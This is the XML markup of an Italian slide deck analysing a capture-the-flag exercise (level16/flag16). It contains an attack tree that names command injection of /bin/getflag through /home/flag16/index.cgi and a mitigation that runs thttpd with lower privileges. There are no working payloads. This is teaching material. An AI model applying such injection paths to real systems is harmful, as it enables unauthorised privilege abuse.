        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="714799" y="474832"/>
            <a:ext cx="77040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3"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1365850" y="447121"/>
            <a:ext cx="64122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MITIGAZIONE #1</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="1442" name="Google Shape;1442;p53"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="7631947" y="649694"/>
            <a:ext cx="636814" cy="120078"/>
            <a:chOff x="8209059" y="198000"/>
            <a:chExt cx="636814" cy="120078"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1443" name="Google Shape;1443;p53"/>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3"/>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3"/>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976;p108">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DE827554-4B0E-E24D-93EB-E98E9CD0BFE7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1010583" y="1252219"/>
            <a:ext cx="7313596" cy="139544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285750" indent="-285750"/>
            <a:r>
              <a:rPr lang="it-IT" sz="1400"/>
              <a:t>Possiamo </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1400" b="1" u="sng">
                <a:solidFill>
                  <a:schemeClr val="lt2"/>
                </a:solidFill>
                <a:uFill>
                  <a:noFill/>
                </a:uFill>
              </a:rPr>
              <a:t>riconfigurare</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1400"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1400" b="1" err="1"/>
              <a:t>thttpd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1400" b="1"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1400"/>
              <a:t>in modo che esegua con i privilegi di un utente inferiore, ad esempio level16 (piuttosto che di flag16). </a:t>
            </a:r>
            <a:endParaRPr lang="it-IT" sz="1400" b="1" u="sng">
              <a:solidFill>
                <a:schemeClr val="lt2"/>
              </a:solidFill>
              <a:uFill>
                <a:noFill/>
              </a:uFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="it-IT" sz="1400"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="it-IT" sz="1400"/>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750"/>
            <a:r>
              <a:rPr lang="it-IT" sz="1400"/>
              <a:t>Prima verifichiamo che il file </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1400" b="1"/>
              <a:t>/home/flag16/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1400" b="1" err="1"/>
              <a:t>thttpd.conf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1400" b="1"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1400"/>
              <a:t>sia quello effettivamente usato dal server.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Immagine 3" descr="Immagine che contiene testo&#10;&#10;Descrizione generata automaticamente">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DD67761F-736F-2E9C-91B2-BE9919FED2A5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1208768" y="2893712"/>
            <a:ext cx="6716062" cy="857370"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Rettangolo 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{82FF0CA8-30A5-91B6-3B19-2321E05AD009}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1269242" y="3193576"/>
            <a:ext cx="6114197" cy="1978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836635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cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="23" name="Connettore diritto 22">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4A4F7672-20AF-3433-A5D5-9FCF61743F03}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
            <a:stCxn id="6" idx="2"/>
            <a:endCxn id="22" idx="0"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5486649" y="2592473"/>
            <a:ext cx="188666" cy="725803"/>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Connettore diritto 18">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1F8CB38A-B52B-C4F6-D7D8-89C33228A1EF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
            <a:stCxn id="6" idx="2"/>
            <a:endCxn id="18" idx="0"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="3825488" y="2592473"/>
            <a:ext cx="1661161" cy="725803"/>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Google Shape;4822;p101">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DCCD2D65-4409-EDDA-0A26-970C6BDF943A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5996222" y="231955"/>
            <a:ext cx="2784570" cy="1389028"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 3822"/>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4824;p101">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BB17CC0F-C289-B7CA-AACB-7C24EA96C261}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="7941615" y="322874"/>
            <a:ext cx="636814" cy="120078"/>
            <a:chOff x="8209059" y="198000"/>
            <a:chExt cx="636814" cy="120078"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="10" name="Google Shape;4825;p101">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7C20EC95-C62B-921A-A1AA-1A4CF48FBC12}"/>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826;p101">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A197DFF9-854A-3501-FDA7-DAB8171626A6}"/>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827;p101">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F4AEA212-F56A-A5B2-193A-6E0D5E868AE5}"/>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 name="Connettore diritto 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2556DA2F-5ADE-D507-196A-EC0C36FB8ECF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
            <a:stCxn id="2" idx="2"/>
            <a:endCxn id="3" idx="0"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="1517073" y="1112948"/>
            <a:ext cx="1874055" cy="878756"/>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Rettangolo 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AB219DE4-3688-C785-E0F8-733BAE26DBAE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2518292" y="607256"/>
            <a:ext cx="1745672" cy="50569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it-IT">
                <a:solidFill>
                  <a:schemeClr val="bg2"/>
                </a:solidFill>
                <a:latin typeface="Quicksand" panose="020B0604020202020204" charset="0"/>
              </a:rPr>
              <a:t>Bandierina</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Triangolo isoscele 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{280A3A8B-446C-D676-492D-E5419E2B5FFE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="429491" y="1991704"/>
            <a:ext cx="2175163" cy="1257188"/>
          </a:xfrm>
          <a:prstGeom prst="triangle">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="bg1"/>
          </a:solidFill>
          <a:ln>
            <a:solidFill>
              <a:schemeClr val="tx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it-IT" sz="1200">
                <a:solidFill>
                  <a:schemeClr val="bg2"/>
                </a:solidFill>
                <a:latin typeface="Quicksand" panose="020B0604020202020204" charset="0"/>
              </a:rPr>
              <a:t>Attacchi impraticabili</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="14" name="Connettore diritto 13">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D7915B40-3F40-96E4-B033-9FA12075422E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
            <a:stCxn id="2" idx="2"/>
            <a:endCxn id="6" idx="0"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3391128" y="1112948"/>
            <a:ext cx="2095521" cy="973833"/>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6" name="Rettangolo 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D4A499E9-7B32-208B-FCD1-4E78EF055B3C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3979967" y="2086781"/>
            <a:ext cx="3013364" cy="50569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it-IT">
                <a:solidFill>
                  <a:schemeClr val="bg2"/>
                </a:solidFill>
                <a:latin typeface="Quicksand" panose="020B0604020202020204" charset="0"/>
              </a:rPr>
              <a:t>Esecuzione indiretta di </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" b="1">
                <a:solidFill>
                  <a:schemeClr val="bg2"/>
                </a:solidFill>
                <a:latin typeface="Quicksand" panose="020B0604020202020204" charset="0"/>
              </a:rPr>
              <a:t>/bin/getflag</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT">
                <a:solidFill>
                  <a:schemeClr val="bg2"/>
                </a:solidFill>
                <a:latin typeface="Quicksand" panose="020B0604020202020204" charset="0"/>
              </a:rPr>
              <a:t> come utente </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" b="1">
                <a:solidFill>
                  <a:schemeClr val="bg2"/>
                </a:solidFill>
                <a:latin typeface="Quicksand" panose="020B0604020202020204" charset="0"/>
              </a:rPr>
              <a:t>flag16</a:t>
            </a:r>
            <a:endParaRPr lang="it-IT">
              <a:solidFill>
                <a:schemeClr val="bg2"/>
              </a:solidFill>
              <a:latin typeface="Quicksand" panose="020B0604020202020204" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="18" name="Rettangolo 17">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{69CC5D6D-6426-3B53-5F30-522A093D21D8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3077439" y="3318276"/>
            <a:ext cx="1496098" cy="50569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it-IT">
                <a:solidFill>
                  <a:schemeClr val="bg2"/>
                </a:solidFill>
                <a:latin typeface="Quicksand" panose="020B0604020202020204" charset="0"/>
              </a:rPr>
              <a:t>Login come utente </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" b="1">
                <a:solidFill>
                  <a:schemeClr val="bg2"/>
                </a:solidFill>
                <a:latin typeface="Quicksand" panose="020B0604020202020204" charset="0"/>
              </a:rPr>
              <a:t>level16</a:t>
            </a:r>
            <a:endParaRPr lang="it-IT">
              <a:solidFill>
                <a:schemeClr val="bg2"/>
              </a:solidFill>
              <a:latin typeface="Quicksand" panose="020B0604020202020204" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="22" name="Rettangolo 21">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EAC40AE4-C488-0A30-AE18-4425D5C3F198}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5013809" y="3318276"/>
            <a:ext cx="1323012" cy="50569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it-IT">
                <a:solidFill>
                  <a:schemeClr val="bg2"/>
                </a:solidFill>
                <a:latin typeface="Quicksand" panose="020B0604020202020204" charset="0"/>
              </a:rPr>
              <a:t>Iniezione di </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" b="1">
                <a:solidFill>
                  <a:schemeClr val="bg2"/>
                </a:solidFill>
                <a:latin typeface="Quicksand" panose="020B0604020202020204" charset="0"/>
              </a:rPr>
              <a:t>/bin/getflag</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="29" name="Figura a mano libera: forma 28">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C256A9B1-7B2C-30E7-2102-927796F49FA0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="20736068">
            <a:off x="5518795" y="2693663"/>
            <a:ext cx="228824" cy="68340"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="connsiteX0" fmla="*/ 0 w 367145"/>
              <a:gd name="connsiteY0" fmla="*/ 6927 h 124707"/>
              <a:gd name="connsiteX1" fmla="*/ 193963 w 367145"/>
              <a:gd name="connsiteY1" fmla="*/ 124691 h 124707"/>
              <a:gd name="connsiteX2" fmla="*/ 367145 w 367145"/>
              <a:gd name="connsiteY2" fmla="*/ 0 h 124707"/>
            </a:gdLst>
            <a:ahLst/>
            <a:cxnLst>
              <a:cxn ang="0">
                <a:pos x="connsiteX0" y="connsiteY0"/>
              </a:cxn>
              <a:cxn ang="0">
                <a:pos x="connsiteX1" y="connsiteY1"/>
              </a:cxn>
              <a:cxn ang="0">
                <a:pos x="connsiteX2" y="connsiteY2"/>
              </a:cxn>
            </a:cxnLst>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="367145" h="124707">
                <a:moveTo>
                  <a:pt x="0" y="6927"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="66386" y="66386"/>
                  <a:pt x="132772" y="125845"/>
                  <a:pt x="193963" y="124691"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="255154" y="123537"/>
                  <a:pt x="311149" y="61768"/>
                  <a:pt x="367145" y="0"/>
                </a:cubicBezTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="1905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30" name="CasellaDiTesto 29">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B769B9BA-007F-31FF-F7D1-12DAA5F2B9D6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5539956" y="2714514"/>
            <a:ext cx="479618" cy="261610"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="it-IT" sz="1100" b="1">
                <a:latin typeface="Quicksand" panose="020B0604020202020204" charset="0"/>
              </a:rPr>
              <a:t>AND</a:t>
            </a:r>
            <a:endParaRPr lang="it-IT" b="1">
              <a:latin typeface="Quicksand" panose="020B0604020202020204" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Google Shape;4823;p101">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A89C143F-F032-E962-CEED-612851EF821C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6222828" y="224307"/>
            <a:ext cx="2784570" cy="1610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600"/>
              <a:buFont typeface="Bebas Neue"/>
              <a:buNone/>
              <a:defRPr sz="3600" b="0" i="0" u="none" strike="noStrike" cap="none">
                <a:solidFill>
                  <a:schemeClr val="dk2"/>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it-IT" sz="3200"/>
              <a:t>COSTRUZIONE DI UN </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="3200">
                <a:solidFill>
                  <a:schemeClr val="accent5"/>
                </a:solidFill>
              </a:rPr>
              <a:t>ALBERO</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="3200"/>
              <a:t> DI  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="3200">
                <a:solidFill>
                  <a:schemeClr val="lt2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>ATTACCO</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="44" name="Connettore diritto 43">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{01A4CF54-C4A3-134E-CB6C-962DAD3454F7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
            <a:stCxn id="6" idx="2"/>
            <a:endCxn id="49" idx="0"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5486649" y="2592473"/>
            <a:ext cx="2282288" cy="71602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49" name="Rettangolo 48">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{67C79F69-A287-10E8-E412-61DF32FE5AEB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6643255" y="3308494"/>
            <a:ext cx="2251363" cy="50569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it-IT">
                <a:solidFill>
                  <a:schemeClr val="bg2"/>
                </a:solidFill>
                <a:latin typeface="Quicksand" panose="020B0604020202020204" charset="0"/>
              </a:rPr>
              <a:t>Esecuzione di </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="it-IT" b="1">
                <a:solidFill>
                  <a:schemeClr val="bg2"/>
                </a:solidFill>
                <a:latin typeface="Quicksand" panose="020B0604020202020204" charset="0"/>
              </a:rPr>
              <a:t>/home/flag16/index.cgi</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="58" name="Connettore 2 57">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{471D12ED-4903-A6C9-5983-C42C37C4E37A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="5675315" y="3886200"/>
            <a:ext cx="0" cy="405581"/>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sp>
        <p:nvSpPr>
          <p:cNvPr id="59" name="CasellaDiTesto 58">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8698858F-5CD8-4357-5579-0707D4672F6A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5528480" y="4280271"/>
            <a:ext cx="293670" cy="307777"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="it-IT" b="1">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>?</a:t>
            </a:r>
            <a:endParaRPr lang="it-IT" sz="1800" b="1">
              <a:latin typeface="+mj-lt"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="60" name="Rettangolo 59">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6F15F3C7-1CDF-3C82-8515-ABCC9F961229}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2988393" y="3058755"/>
            <a:ext cx="308714" cy="328887"/>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61" name="CasellaDiTesto 60">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AFA66D40-873B-3637-1D29-16FD53F7BC39}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3005836" y="3053889"/>
            <a:ext cx="304892" cy="307777"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="it-IT" b="1"/>
              <a:t>P</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="62" name="CasellaDiTesto 61">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1D84925D-24A8-30E3-8722-1B6C2921E089}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="570873" y="3154604"/>
            <a:ext cx="234360" cy="307777"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="it-IT" b="1"/>
              <a:t>I</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="64" name="Rettangolo 63">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{93F1594E-1905-6282-FEBC-E5A88C5CE232}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="533696" y="3144050"/>
            <a:ext cx="308714" cy="328887"/>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39956502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39" name="Google Shape;1439;p53"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="714799" y="474832"/>
            <a:ext cx="77040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3"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1365850" y="447121"/>
            <a:ext cx="64122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MITIGAZIONE #1</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="1442" name="Google Shape;1442;p53"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="7631947" y="649694"/>
            <a:ext cx="636814" cy="120078"/>
            <a:chOff x="8209059" y="198000"/>
            <a:chExt cx="636814" cy="120078"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1443" name="Google Shape;1443;p53"/>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3"/>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3"/>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976;p108">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DE827554-4B0E-E24D-93EB-E98E9CD0BFE7}"/>
